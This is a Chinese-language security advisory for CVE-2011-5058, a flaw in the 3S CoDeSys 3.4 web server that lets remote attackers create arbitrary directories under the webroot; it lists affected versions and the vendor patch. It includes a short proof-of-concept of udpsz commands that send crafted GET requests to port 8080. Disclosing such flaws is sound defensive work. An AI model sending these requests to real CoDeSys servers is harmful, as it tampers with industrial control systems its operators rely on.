发布日期:2011-11-29
更新日期:2012-12-01受影响系统:
3S CoDeSys 3.4 SP4 Patch 2
3S CoDeSys 2.3
不受影响系统:
3S CoDeSys 3.5
3S CoDeSys 2.3.9.32
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56732
CVE(CAN) ID: CVE-2011-5058CoDeSys是Windows平台下,独立于硬件的IEC 61131-3开发系统,用于编程和创建控制器应用。3S CoDeSys 3.4 SP4 Patch 2内的Control服务CmbWebserver.dll模块在处理包含不存在目录的HTTP GET请求时存在错误,通过向TCP端口8080发送特制请求,可允许远程攻击者在Webroot下创建任意目录。<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:http://secunia.com/advisories/47018
http://aluigi.altervista.org/adv/codesys_1-adv.txt
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!udpsz -T -c "GET /dir\a HTTP/1.0
" SERVER 8080 -1
udpsz -T -c "GET /dir\dir\a HTTP/1.0
" SERVER 8080 -1
udpsz -T -c "GET /dir\dir\dir\a HTTP/1.0
" SERVER 8080 -1
udpsz -T -c "GET /dir\dir\dir\dir\a HTTP/1.0
" SERVER 8080 -1
udpsz -T -c "GET /dir\dir\dir\dir\dir\a HTTP/1.0
" SERVER 8080 -1
...建议:
--------------------------------------------------------------------------------
厂商补丁:3S
--
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.codesys.com/download.htmlOpenStack令牌过期安全绕过漏洞FCKEditor "FileUpload()"函数任意文件上传漏洞相关资讯 CoDeSys 目录遍历漏洞 CoDeSys安全漏洞
- CODESYS Gateway Server释放后重用 (05/25/2013 06:14:48)
- Oracle GlassFish Web Space (03/14/2013 15:01:43)
- CoDeSys目录遍历漏洞 (01/16/2013 08:23:51)
| - CoDeSys Gateway Server目录遍历漏 (04/26/2013 12:18:01)
- CoDeSys "Gateway Server"多个安全 (02/22/2013 08:54:22)
- CoDeSys身份验证绕过漏洞 (01/16/2013 08:23:22)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保
|
易网时代-编程资源站